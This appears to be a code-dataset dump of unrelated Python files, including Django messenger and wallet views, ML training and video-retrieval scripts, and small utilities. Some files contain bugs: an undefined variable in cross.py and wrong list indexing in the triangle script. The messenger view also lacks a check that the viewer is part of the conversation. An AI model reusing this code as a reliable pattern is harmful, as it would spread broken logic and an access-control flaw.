int(amount) == 150:\n\t\t\t\t\taccount.premium_type = 3\n\t\t\t\taccount.save()\n\n\t\t\treturn redirect('dashboard')\n\t\t\n\t\tprint(\"very inside\")\n\t\tamount = 5000\n\t\twallet = Wallet.objects.filter(user = request.user)[0]\n\t\tprint(wallet.balance)\n\t\tif(wallet.balance - int(amount) >=0):\n\t\t\twallet.balance = int(wallet.balance) - amount\n\t\t\tprint(wallet.balance)\t\n\t\t\twallet.save()\n\t\t\taccount.is_commercial_user = True\n\t\t\taccount.save()\n\t\treturn redirect('dashboard')\n\n\treturn render(request, 'upgrade_payment.html', args)\n\n# adarsh\n\ndef messenger_view(request):\n\tif not request.user.is_authenticated:\n \t\treturn redirect('login')\n\tuser_1 = request.user\n\tfriends = (Friend.objects.filter(user_1 = user_1) | Friend.objects.filter(user_2 = user_1) ) & Friend.objects.filter(status = True)\n\n\targs = {\n\t\t'friends' : friends,\n\t\t'status' : 200,\n\t\t'errors' : ''\n\t}\n\n\t# args = {\n\t\n\t# }\t\n\treturn render(request, 'messenger.html', args)\n\n\n\t\t\ndef messenge_view(request,user_1,user_2):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\tval=False\n\tmes=[]\n\tis_friend=False\n\n\tu_1 = Account.objects.filter(id = int(user_1))\n\tu_2 = Account.objects.filter(id = int(user_2))\n\n\tif u_1.count() == 0 or u_2.count() == 0:\n\t\treturn redirect('home')\n\n\tu_1 = u_1[0]\n\tu_2 = u_2[0]\n\n\tif u_1 == None or u_2 == None:\n\t\treturn redirect('home')\n\n\tif (Friend.objects.filter(user_1 = u_1, user_2=u_2)).exists() | (Friend.objects.filter(user_1 = u_2, user_2=u_1)).exists():\n \t\tis_friend=True\n\tif(not is_friend):\n\t\treturn redirect('home')\t\t\n\taccounts = Account.objects.all()\n\n\tif u_1 == request.user:\n\t\tval = u_1.is_commercial_user | u_1.is_premium_user\n\n\tif u_2 == request.user:\n\t\tval = u_2.is_commercial_user | u_2.is_premium_user\n\tprint(val)\n\n\tvalue =Message.objects.all().order_by('message_sent')\n\tfor i in range(len(value)):\n\t\tif((int(value[i].user_1.id)==int(user_1) and int(value[i].user_2.id)==int(user_2) and is_friend) or (int(value[i].user_2.id)==int(user_1) and int(value[i].user_1.id)==int(user_2) and is_friend)):\n\t\t\tmes.append(value[i])\n\t\t\t\n \t\t\t\t\t\n\targs1={\n\t\t'visibile' :val,\n\t\t'message' : mes,\n\t}\n\n\tif(request.method == 'POST'):\n\t\tmm = request.POST.get('post_area')\n\n\t\tif mm == '':\n\t\t\treturn redirect('/messenger/'+user_1+'/'+user_2+'/')\n\n\t\tu11 = Account.objects.filter(id = int(user_1))[0]\n\t\tu21 = Account.objects.filter(id = int(user_2))[0]\n\t\ttme = timezone.now()\n\t\tvar = Message(user_1 = u11,user_2 = u21,message = mm,message_sent=tme)\n\t\tprint(var.message_sent)\n\t\tvar.save()\n\t\treturn redirect('/messenger/'+user_1+'/'+user_2+'/')\n\treturn render(request, 'chatapp.html', args1)\n\ndef create_page_view(request):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tif not request.user.is_commercial_user:\n\t\treturn redirect('dashboard')\n\n\n\targs = {\n\n\t}\n\n\tif request.method == \"POST\":\n\t\tpage_title = request.POST.get('page_name')\n\t\tcontent = request.POST.get('content')\n\n\t\tp = Page(page_title = page_title, content = content, user = request.user)\n\t\tp.save()\n\n\t\tprint(page_title)\n\t\tprint(content)\n\n\n\n\treturn render(request, 'create_page.html', args)\n\ndef page_view(request, id):\n\tif not request.user.is_authenticated:\n\t\treturn redirect('login')\n\n\tif(Page.objects.filter(id = int(id)).count() == 0):\n\t\treturn redirect('dashboard')\n\n\tp_data = Page.objects.filter(id = int(id))[0]\n\n\tprint(p_data.page_title)\n\n\targs = {\n\t\t'page_data' : p_data\n\t}\n\n\treturn render(request, 'page.html', args)\n","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"575188618","text":"import pytest\nimport sys\nimport asyncio\nfrom async_generator import async_generator, yield_\n\ntry:\n import trio_asyncio\nexcept ImportError:\n pytestmark = pytest.mark.skip(reason=\"trio-asyncio not available\")\n\n\nasync def use_asyncio():\n await trio_asyncio.aio_as_trio(asyncio.sleep)(0)\n\n\n@pytest.fixture()\n@async_generator\nasync def asyncio_loop():\n async with trio_asyncio.open_loop() as loop:\n await yield_(loop)\n\n\n@pytest.fixture()\n@async_generator\nasync def asyncio_fixture_with_fixtured_loop(asyncio_loop):\n await use_asyncio()\n await yield_()\n\n\n@pytest.fixture()\n@async_generator\nasync def asyncio_fixture_own_loop():\n async with trio_asyncio.open_loop():\n await use_asyncio()\n await yield_()\n\n\n@pytest.mark.trio\nasync def test_no_fixture():\n async with trio_asyncio.open_loop():\n await use_asyncio()\n\n\n@pytest.mark.trio\nasync def test_half_fixtured_asyncpg_conn(asyncio_fixture_own_loop):\n await use_asyncio()\n\n\n@pytest.mark.trio\nasync def test_fixtured_asyncpg_conn(asyncio_fixture_with_fixtured_loop):\n await use_asyncio()\n","sub_path":"pytest_trio/_tests/test_trio_asyncio.py","file_name":"test_trio_asyncio.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"233285615","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nimport trader_vae\n\ntraining_data_path = r\"C:\\Users\\Fifth\\Trader\\Trader\\TrainingDataMini1Vol.npz\"\ndata = np.load(training_data_path)\ntraining_data = data['x_train']\nfuture_price = data['y_train']\ndata.close()\n\n# data processing\nnSamples = training_data.shape[0]\nnTimesteps = training_data.shape[1]\nnFeatures = training_data.shape[2]\n\nTVAE = trader_vae.Trader_VAE(nTimesteps,nFeatures)\n\nprice_histories = training_data[:,:,0]\nvolume_histories = training_data[:,:,1]\n\nprice_scaler = MinMaxScaler(feature_range=(-1, 1))\nvolume_scaler = MinMaxScaler(feature_range=(-1, 1))\n\nprice_scaler.fit(future_price)\nvolume_scaler.fit(volume_histories)\n\nprice_histories_scaled = np.reshape(price_scaler.transform(price_histories),(nSamples,nTimesteps,1))\nvolume_histories_scaled = np.reshape(volume_scaler.transform(volume_histories),(nSamples,nTimesteps,1))\ntraining_data_scaled = np.concatenate((price_histories_scaled,volume_histories_scaled),axis=2)\n\nfuture_price_scaled = price_scaler.transform(future_price)\n\nxs = training_data_scaled[:,:,0]\nxs = np.reshape(xs,(nSamples,nTimesteps))\n\nTVAE.train(xs)\n\nplt.figure(figsize = (15, 5))\nfor idx in range(0,nSamples):\n price_history_scaled = training_data_scaled[idx,:,0]\n test_data = np.reshape(price_history_scaled, (1, nTimesteps,))\n plt.plot(price_history_scaled,label='truth')\n latent_var = TVAE.encoder.predict(test_data)\n decoded_data = TVAE.decoder.predict(latent_var)\n decoded_prices_scaled = np.reshape(decoded_data[:],(nTimesteps,1))\n plt.plot(decoded_prices_scaled,label=\"decoded\")\n plt.ylim(0,1)\n plt.show()\n plt.legend()\n plt.pause(0.1)\n plt.clf()","sub_path":"Dream_playground.py","file_name":"Dream_playground.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"513624778","text":"import random\nimport csv\nimport time\nimport os\n\n#명령창으로부터 input값을 얻어 n에 저장한다.\n#n이 1000,2000으로 클수록 생각보다 오래 걸리길래, 몇 초가 걸렸는지 궁금해서 시간을 확인했다.\n#n=1000 - 1.859초, n=3000 - 14.752초 \nn=int(input(\"삼각형의 크기(층)를 입력하시오 : \"))\ncal_start = time.time()\n\n#Input값을 토대로 n층의 랜덤한 삼각형을 만들어, triangle.csv에 저장한다.\nwith open('triangle.csv', 'w', newline='') as fw:\n wr = csv.writer(fw,delimiter=',')\n for i in range(1,n+1):\n a=[]\n j = 1\n while j <= i:\n a.append(random.randint(0,99))\n j=j+1\n wr.writerow(a)\nfw.close\n\n#저장한 triangle.csv를 읽어오며 각 row는 하나의 배열이므로 a배열은 2차원 배열이 된다.\nwith open('triangle.csv', 'r') as fo:\n reader_csv = csv.reader(fo)\n i=0\n for row in reader_csv:\n a[i]=row\n i=i+1\n if n <= 30:\n print(row)\ni=n\n\n#triangle을 불러온 뒤 경로합을 구하기 위해 아래층에서부터 올라간다.\n#수열의 개념이므로, i에 대해 일반화 하면 알고리즘을 만들 수 있다.\n#i-1층의 j번째에 i층의 j,j+1번째 수 중 더 큰 값을 더하면 i층을 지우고 i-1번째 층까지만 생각 해도 된다.\n#이 개념으로 맨 윗층까지 반복하면 맨 윗층은 i층까지의 최대 경로합과 같아진다.\nwhile i >= 2:\n #print(a[i-1])\n for j in range(0,i-1):\n a[i-2][j]=int(a[i-2][j])+max(int(a[i-1][j]),int(a[i-1][j+1]))\n #print(a[i-2][j])\n i=i-1\n \nelapsed = int(1000*(time.time() - cal_start))\n\n#맨 윗층인 a[0][0]이 최대 경로합이다.\nprint('Calculate time : %d ms\\n최대 경로합 : %d'%(elapsed,a[0][0]))\nos.system('Pause')\n","sub_path":"10th_act/0718/homework/Algorithm/no1.py","file_name":"no1.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"343932355","text":"#James Roth\n#5/17/18\n#warmup17.py - words with all chars of my last name\n\nfile = open(\"engmix.txt\")\n\nname = input(\"Enter your last name: \")\n\nnameChar = []\n\nfor char in name:\n if char not in nameChar:\n nameChar.append(char.lower())\n\nfor item in file:\n num = 0\n for i in range(0,len(nameChar)):\n if nameChar[i] in item:\n num+=1\n if num == len(nameChar):\n print(item)","sub_path":"warmup17.py","file_name":"warmup17.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"499745271","text":"## Imports\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nlayers = tf.keras.layers\n\nnum_epochs = 20\n\ndata_filename = \"DataConv{}.cvs\"\ndata_stride = 1\n\ntf.random.set_seed (123456)\n\n## Load data\nchar_set = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = char_set.load_data ()\n\nshape_t = x_train.shape\nx_train = x_train.reshape (shape_t[0],shape_t[1],shape_t[2],1)\nshape_v = x_test.shape\nx_test = x_test.reshape (shape_v[0],shape_v[1],shape_v[2],1)\n\nprint (\"Reshaped\")\n\nsample_size = x_train.shape[0]\nsample_shape = x_train[0].shape\n\n## Normalize\nx_train = x_train/255.0\nx_test = x_test /255.0\n\n## Create model\nmodel = tf.keras.models.Sequential ()\nmodel.add (layers.Conv2D (4, (7,7), activation='relu', input_shape=sample_shape))\n#model.add (layers.Dropout (0.2))\nmodel.add (layers.Conv2D (6, (7,7), activation='relu'))\n#model.add (layers.Dropout (0.2))\nmodel.add (layers.Conv2D (10, (7,7), activation='relu'))\n#model.add (layers.Dropout (0.2))\nmodel.add (layers.Flatten ())\nmodel.add (layers.Dense (10, activation=\"softmax\"))\nmodel.summary ()\n\nmodel.compile (optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=[])\n\n## Train\nresult = model.fit (x_train, y_train,\n epochs=num_epochs,\n batch_size=600,#6000,\n verbose=1,\n validation_data=(x_test, y_test))\n\n\n\nprint (\"initial loss:\", result.history['loss'][0])\nprint (\"initial vali:\", result.history['val_loss'][0])\nprint (\"final loss: \", result.history['loss'][-1])\nprint (\"final vali: \", result.history['val_loss'][-1])\npred_train = np.argmax (model.predict (x_train), axis=1)\npred_test = np.argmax (model.predict (x_test), axis=1)\ndiff_train = pred_train - y_train\ndiff_test = pred_test - y_test\nerrs_train = np.sum (np.absolute (diff_train))\nerrs_test = np.sum (np.absolute (diff_test))\nprint (\"training size: \", x_train.shape[0])\nprint (\"training errors: \", errs_train)\nprint (\"training %err: \", 100*errs_train/x_train.shape[0])\nprint (\"validation size: \", x_test.shape[0])\nprint (\"validation errors:\", errs_test)\nprint (\"validation %err: \", 100*errs_test/x_test.shape[0])\n\n## Plot\nepoch = range (num_epochs)\nif data_filename:\n for att in [[\"loss\",\"Loss\"],[\"val_loss\",\"Vali\"]]:\n with open (data_filename.format (att[1]), \"w\") as f:\n prop = result.history[att[0]]\n for i in range (0, len (prop), data_stride):\n f.write (\"{0:d},{1:f}\\n\".format (i, prop[i]))\nplt.plot (epoch, result.history['loss'], label='loss')\nplt.plot (epoch, result.history['val_loss'], label='validation')\nplt.legend ()\nplt.show ()\n\n\n","sub_path":"Code/CharacterRecognition/Conv.py","file_name":"Conv.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"489317417","text":"from object_detector import DarkNet\nimport logging\nimport sys\nimport zerorpc\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setLevel(logging.DEBUG)\nlogger.addHandler(handler)\nweight_path = '../model/custom_tiny_yolov3.weights'\nnetwork_config_path = '../cfg/custom-tiny.cfg'\nobject_config_path = '../cfg/custom.data'\n\ndark = DarkNet(weight_path, network_config_path, object_config_path)\ns = zerorpc.Server(dark)\ns.bind(\"tcp://0.0.0.0:4242\")\ns.run()\n","sub_path":"oldcode/src/object_detector_server.py","file_name":"object_detector_server.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"336046493","text":"import numpy as np\nimport os\nimport h5py\nfrom tqdm import tqdm\nfrom glob import glob\nimport pickle as pk\nimport json\nimport time\nfrom scipy.spatial.distance import cdist\nfrom future.utils import viewitems, lrange\nfrom sklearn.metrics import precision_recall_curve\n\n\n# In[2]:\n\n\ndef read_h5file(path):\n hf = h5py.File(path, 'r')\n g1 = hf.get('images')\n g2 = hf.get('names')\n return g1.keys(), g1, g2\n\ndef load_features(dataset_dir, is_gv=True):\n '''\n 加载特征\n :param dataset_dir: 特征所在的目录, 例如:/home/camp/FIVR/features/vcms_v1\n :param is_gv: 是否取平均。True:返回帧平均的结果,False:保留所有帧的特征\n :return:\n '''\n h5_paths = glob(os.path.join(dataset_dir, '*.h5'))\n print(h5_paths)\n vfeat = {}\n vid2features = {}\n final_vids = []\n features = []\n for h5_path in h5_paths:\n vids, g1, g2 = read_h5file(h5_path)\n for vid in tqdm(vids):\n if is_gv:\n cur_arr = g1.get(vid)\n #print(\"1:\",cur_arr.shape)\n cur_arr_ave = np.mean(cur_arr, axis=0, keepdims=False)\n cur_arr_max = np.max(cur_arr, axis=0, keepdims=False)\n cur_arr = np.concatenate([cur_arr_ave, cur_arr_max], axis=0)\n cur_arr /= (np.linalg.norm(cur_arr, ord=2, axis=0))\n #print(cur_arr.shape)\n vid2features[vid] = cur_arr\n else:\n cur_arr = g1.get(vid)\n #print(\"1:\",cur_arr.shape)\n #cur_arr = np.concatenate([cur_arr, np.mean(cur_arr, axis=0, keepdims=True)], axis=0)\n cur_arr = np.asarray(cur_arr)\n cur_arr_mean = np.mean(cur_arr, axis=0, keepdims=True)\n vfeat[vid] = cur_arr_mean\n vid2features[vid] = cur_arr\n #print(cur_arr.shape)\n final_vids.extend([vid] * len(cur_arr))\n features.extend(cur_arr)\n if is_gv:\n return vid2features\n else:\n return final_vids, features, vfeat, vid2features\n\ndef calculate_similarities_matrix(query_features, all_features):\n \"\"\"\n 用于计算两组特征(已经做过l2-norm)之间的相似度\n Args:\n queries: shape: [N, D]\n features: shape: [M, D]\n Returns:\n similarities: shape: [N, M]\n \"\"\"\n similarities = []\n # 计算待查询视频和所有视频的距离\n dist = np.nan_to_num(cdist(query_features, all_features, metric='cosine'))\n for i, v in enumerate(query_features):\n # 归一化,将距离转化成相似度\n # sim = np.round(1 - dist[i] / dist[i].max(), decimals=6)\n sim = 1-dist[i]\n # 按照相似度的从大到小排列,输出index\n similarities += [[(s, sim[s]) for s in sim.argsort()[::-1] if not np.isnan(sim[s])]]\n return similarities\n\n\ndef calculate_similarities_dp(query_features, all_features):\n \"\"\"\n 用于计算两组特征(已经做过l2-norm)之间的相似度\n Args:\n queries: shape: [N, D]\n features: shape: [M, D]\n Returns:\n similarities: shape: [N, M]\n \"\"\"\n similarities = 0.0\n # 计算待查询视频和所有视频的距离\n dist = np.nan_to_num(cdist(query_features, all_features, metric='cosine'))\n \"\"\"\n dp:\n N*M的帧相似度矩阵,防止出现打分交叉\n \"\"\"\n sim = 1 - dist\n f = np.zeros((sim.shape[0], sim.shape[1]), dtype=np.float)\n for i in range(sim.shape[0]):\n max_sim = 0\n for j in range(sim.shape[1]):\n if i == 0:\n f[i, j] = sim[i, j]\n elif j == 0:\n f[i, j] = sim[i, j]\n max_sim = f[i-1, j]\n else:\n max_sim = max(max_sim, f[i-1, j])\n f[i, j] = max_sim + sim[i, j]\n\n return np.max(f[-1,:])\n\ndef calculate_similarities(query_features, all_features):\n \"\"\"\n 用于计算两组特征(已经做过l2-norm)之间的相似度\n Args:\n queries: shape: [N, D]\n features: shape: [M, D]\n Returns:\n similarities: float\n \"\"\"\n similarities = 0.0\n # 计算待查询视频和所有视频的距离\n dist = np.nan_to_num(cdist(query_features, all_features, metric='cosine'))\n sim_list = []\n for i, v in enumerate(query_features):\n # 归一化,将距离转化成相似度\n # sim = np.round(1 - dist[i] / dist[i].max(), decimals=6)\n sim = 1-dist[i]\n # 按照相似度的从大到小排列,输出index\n similarities += np.max(sim)\n #sim_list.append(1 + np.max(sim))\n \n #return max(sim_list)\n return similarities\n\ndef evaluateOfficial(annotations, results, relevant_labels, dataset, quiet):\n \"\"\"\n Calculate of mAP and interpolated PR-curve based on the FIVR evaluation process.\n Args:\n annotations: the annotation labels for each query\n results: the similarities of each query with the videos in the dataset\n relevant_labels: labels that are considered positives\n dataset: video ids contained in the dataset\n Returns:\n mAP: the mean Average Precision\n ps_curve: the values of the PR-curve\n \"\"\"\n pr, mAP = [], []\n iterations = viewitems(annotations) if not quiet else tqdm(viewitems(annotations))\n for query, gt_sets in iterations:\n query = str(query)\n if query not in results: print('WARNING: Query {} is missing from the result file'.format(query)); continue\n if query not in dataset: print('WARNING: Query {} is not in the dataset'.format(query)); continue\n\n # set of relevant videos\n query_gt = set(sum([gt_sets[label] for label in relevant_labels if label in gt_sets], []))\n query_gt = query_gt.intersection(dataset)\n if not query_gt: print('WARNING: Empty annotation set for query {}'.format(query)); continue\n\n # calculation of mean Average Precision (Eq. 6)\n i, ri, s = 0.0, 0, 0.0\n y_target, y_score = [], []\n for video, sim in sorted(viewitems(results[query]), key=lambda x: x[1], reverse=True):\n if video in dataset:\n y_score.append(sim)\n y_target.append(1.0 if video in query_gt else 0.0)\n ri += 1\n if video in query_gt:\n i += 1.0\n s += i / ri\n mAP.append(s / len(query_gt))\n #if not quiet:\n # print('Query:{}\\t\\tAP={:.4f}'.format(query, s / len(query_gt)))\n\n # add the dataset videos that are missing from the result file\n missing = len(query_gt) - y_target.count(1)\n y_target += [1.0 for _ in lrange(missing)] # add 1. for the relevant videos\n y_target += [0.0 for _ in lrange(len(dataset) - len(y_target))] # add 0. for the irrelevant videos\n y_score += [0.0 for _ in lrange(len(dataset) - len(y_score))]\n\n # calculation of interpolate PR-curve (Eq. 5)\n precision, recall, thresholds = precision_recall_curve(y_target, y_score)\n p = []\n for i in lrange(20, -1, -1):\n idx = np.where((recall >= i * 0.05))[0]\n p.append(np.max(precision[idx]))\n pr.append(p)\n # return mAP\n return mAP, np.mean(pr, axis=0)[::-1]\n\nclass GTOBJ:\n def __init__(self):\n annotation_path = '/home/camp/FIVR/annotation/annotation.json'\n dataset_path = '/home/camp/FIVR/annotation/youtube_ids.txt'\n with open(annotation_path, 'r') as f:\n self.annotations = json.load(f)\n self.dataset = set(np.loadtxt(dataset_path, dtype=str).tolist())\ngtobj = GTOBJ()\nrelevant_labels_mapping = {\n 'DSVR': ['ND','DS'],\n 'CSVR': ['ND','DS','CS'],\n 'ISVR': ['ND','DS','CS','IS'],\n}\n\n\n# In[3]:\n\n\ntem_, tem__, vfeat, vid2features = load_features('/home/camp/FIVR/features/vcms_v1', is_gv=False)\n\n\n# In[4]:\n\n\n# 加载特征\nvids = list(vid2features.keys())\nprint(vids[:10])\n\nglobal_mean_features = np.squeeze(np.asarray(list(vfeat.values()), np.float32))\nglobal_feattures = [np.asarray(i,np.float32) for i in list(vid2features.values())]\n\n\n# In[5]:\n\n\n# 加载vid2name 和 name2vid\nwith open('/home/camp/FIVR/vid2name.pk', 'rb') as pk_file:\n vid2names = pk.load(pk_file)\nwith open('/home/camp/FIVR/vid2name.pk', 'rb') as pk_file:\n name2vids = pk.load(pk_file)\n\n\n# In[6]:\n\n\n# 开始评估\nannotation_dir = '/home/camp/FIVR/annotation'\nnames = np.asarray([vid2names[vid][0] for vid in vids])\nquery_names = None\nresults = None\nfor task_name in ['DSVR', 'CSVR', 'ISVR']:\n annotation_path = os.path.join(annotation_dir, task_name + '.json')\n with open(annotation_path, 'r') as annotation_file:\n json_obj = json.load(annotation_file)\n if results is None:\n query_names = json_obj.keys()\n query_names = [str(query_name) for query_name in query_names]\n query_indexs = []\n print(\"query len:\", len(query_names))\n for query_name in query_names:\n tmp = np.where(names == query_name)\n if len(tmp) != 0 and len(tmp[0]) != 0:\n query_indexs.append(tmp[0][0])\n else:\n print('skip query: ', query_name)\n # print(len(query_indexs),query_indexs[0])\n \n query_features = np.squeeze(global_mean_features[query_indexs])\n sim_matrix = calculate_similarities_matrix(query_features, global_mean_features)\n \n results = dict()\n for _,id in enumerate(tqdm(query_indexs)):\n sim_q = sim_matrix[_]\n topk = 10000\n \n gallery_idx = [x[0] for x in sim_q[:topk]]\n\n print(\"video id:\" + str(_))\n similarities = dict()\n query_features = global_feattures[id]\n init_W_q,H_q = query_features.shape\n W_q = W_q * (W_q - 1) // 2\n query_2_features = np.zeros((W_q, H_q), np.float32)\n\n for i in range(init_W_q):\n for j in range(i+1, init_W_q):\n query_2_features[i*init_W_q + j] = (query_features[i] + query_features[j]) / 2\n\n for idx in gallery_idx:\n temp_feature = global_feattures[idx]\n __ = idx\n now_similarities = calculate_similarities(query_features, temp_feature)\n similarities[names[__]] = now_similarities\n\n init_W_q, H_q = temp_feature.shape\n W_q = W_q * (W_q - 1) // 2\n temp_2_features = np.zeros((W_q, H_q), np.float32)\n\n for i in range(init_W_q):\n for j in range(i + 1, init_W_q):\n temp_2_features[i * init_W_q + j] = (temp_2_features[i] + temp_2_features[j]) / 2\n\n now_similarities = calculate_similarities(query_2_features, temp_2_features)\n similarities[names[__]] += now_similarities\n\n query_result = dict(map(lambda v: (names[v[0]], v[1]), sim_q[topk:]))\n \n del similarities[query_names[_]]\n for key, val in similarities.items():\n query_result[key] = val\n \n #similarities = dict(sorted(similarities.items(),key = lambda k:k[1], reverse = True))\n results[query_names[_]] = query_result\n mAPOffcial, precisions = evaluateOfficial(annotations=gtobj.annotations, results=results,\n relevant_labels=relevant_labels_mapping[task_name],\n dataset=gtobj.dataset,\n quiet=False)\n print('{} mAPOffcial is {}'.format(task_name, np.mean(mAPOffcial)))\n\n\n# In[ ]:\n\n","sub_path":"dy_workspace/cross.py","file_name":"cross.py","file_ext":"py","file_size_in_byte":11609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"628682350","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nqueenbey/payload.py\nVince Enachescu\nDopamine Labs 2016\n\n\"\"\"\nimport json\n\nfrom tempfile import mkstemp\nfrom os import fdopen\n\ndef add_payload(payload, request):\n \"\"\"\n attach some data as a post file\n add data, metadata, etc. as a post file payload to a request\n\n payload - function that returns dict or string\n - dict that will be written into json\n\n returns the path to the temporary post_file\n \"\"\"\n\n # use payload function to generate post_file\n if hasattr(payload, '__call__'):\n payload = payload(request)\n\n # write dictionary as a JSON object\n if isinstance(payload, dict):\n payload = json.dumps(payload, indent=4, separators=(', ', ': '))\n request['contenttype'] = 'application/json'\n\n # write sting to file\n if isinstance(payload, str):\n\n fd, post_file = mkstemp()\n fp = fdopen(fd, 'w')\n fp.write(payload)\n fp.close()\n\n request['post_file'] = post_file\n if 'contenttype' not in request.keys():\n request['contenttype'] = 'text/plain'\n\n return post_file\n\n return\n","sub_path":"queenbey/payload.py","file_name":"payload.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"391432723","text":"import re\nimport unidecode\n\nF = open(\"testre.txt\", encoding=\"utf8\")\n\nwhile True:\n\n text = F.readline()\n \n text = text.lower() # lowercase\n StopML=\"de|en|em|para|con|i|sin|a|y|al|la|por|el|com|do|by|promo|envio|producao|cm|mm|oferta|producto|cuotas|interes|oportunidad\"\n REPLACE_STOP = re.compile(\"\\\\b(\"+StopML+\")\\\\b\", re.I)\n REPLACE_SYMBOLS = re.compile('[\\/(){}\\[\\]\\|@,.\\~\\':;\\-*\\_!*+®°%²#$\\\"]')\n REPLACE_1LETTER = re.compile(\" [a-z] {1}\")\n LEAVE_ONLYCHARS = re.compile('[^a-z ]')\n REPLACE_BAD_SPACE = re.compile(' {2,}')\n\n text = unidecode.unidecode(text)\n #text = REPLACE_SYMBOLS.sub(' ', text)\n text = LEAVE_ONLYCHARS.sub(' ', text)\n text = REPLACE_1LETTER.sub(' ', text) \n #text = REPLACE_ZAO.sub(\"cion\", text)\n text = REPLACE_STOP.sub(\" \", text)\n text = REPLACE_BAD_SPACE.sub(' ', text)\n print(text)\n \n input()","sub_path":"testre/testre.py","file_name":"testre.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"544950090","text":"from PyProM.src.utility.util_profile import Util_Profile\nimport copy\n\nclass Util_Multiprocessing(object):\n\ttimefn = Util_Profile.timefn\n\n\tdef __init__(self):\n\t\tsuper(Util_Multiprocessing, self).__init__()\n\n\t@property\n\tdef _constructor(self):\n\t\treturn Util_Multiprocessing\n\n\n\t@classmethod\n\tdef join_dict(cls, output):\n\t\tfor i, matrix in enumerate(output):\n\t\t\tif i == 0:\n\t\t\t\tresult = copy.deepcopy(matrix)\n\t\t\telse:\n\t\t\t\tkeys = result.keys()\n\t\t\t\tfor ai in matrix.keys():\n\t\t\t\t\t# add new ai\n\t\t\t\t\tif ai not in keys:\n\t\t\t\t\t\tresult[ai] = matrix[ai]\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor ai_val in matrix[ai].keys():\n\t\t\t\t\t\t\tif ai_val != 'outgoings':\n\t\t\t\t\t\t\t\tif ai_val not in result.keys():\n\t\t\t\t\t\t\t\t\tresult[ai][ai_val] = matrix[ai][ai_val]\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tresult[ai][ai_val] += matrix[ai][ai_val]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tfor aj in matrix[ai]['outgoings'].keys():\n\t\t\t\t\t\t\t\t\tif aj not in result[ai]['outgoings'].keys():\n\t\t\t\t\t\t\t\t\t\tresult[ai]['outgoings'][aj] = matrix[ai]['outgoings'][aj]\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tfor aj_val in matrix[ai]['outgoings'][aj].keys():\n\t\t\t\t\t\t\t\t\t\t\tresult[ai]['outgoings'][aj][aj_val] += matrix[ai]['outgoings'][aj][aj_val]\n\t\treturn result","sub_path":"src/utility/util_multiprocessing.py","file_name":"util_multiprocessing.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"327849625","text":"class Solution:\n def getRow(self, rowIndex):\n if rowIndex == 0:\n return [1]\n\n tmp = [1]\n res = []\n \n while len(res) < rowIndex + 1:\n res = []\n # 前後加 0以利兩兩相加\n tmp = [0] + tmp + [0]\n \n for i in range(0, len(tmp)-1):\n res.append(tmp[i]+tmp[i+1])\n \n tmp = res\n \n return res\n \nif __name__ == \"__main__\":\n s = Solution()\n print(s.getRow(rowIndex = 5))","sub_path":"119-Pascal's-Triangle-II/Pascal's-Triangle-II.py","file_name":"Pascal's-Triangle-II.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"633834620","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: fdtool\\modules\\dbschema\\dbschema.py\n# Compiled at: 2018-06-19 13:38:40\nimport sys, re, string, math\nfrom itertools import *\nlowercase = string.lowercase + 'ßäöüçáéíóúàèìòùãẽĩõũâêîôûëï'\nuppercase = string.uppercase + 'ÄÖÜÇÁÉÍÓÚÀÈÌÒÙÃẼĨÕŨÂÊÎÔÛËÏ'\nletters = lowercase + uppercase\n\ndef upcSplit(s):\n attr = None\n attrs = set()\n for c in s:\n if c in uppercase:\n if attr != None:\n attrs.add(attr)\n attr = c\n else:\n if attr == None:\n attr = ''\n attr += c\n\n if attr != None:\n attrs.add(attr)\n return attrs\n\n\ndef unionUpcSplit(s):\n return map(set, chain(*map(upcSplit, s)))\n\n\nsep = re.compile('[ ]*[/, \\r\\n][ ]*')\nintdepsep = re.compile(';')\nallsep = re.compile('[ 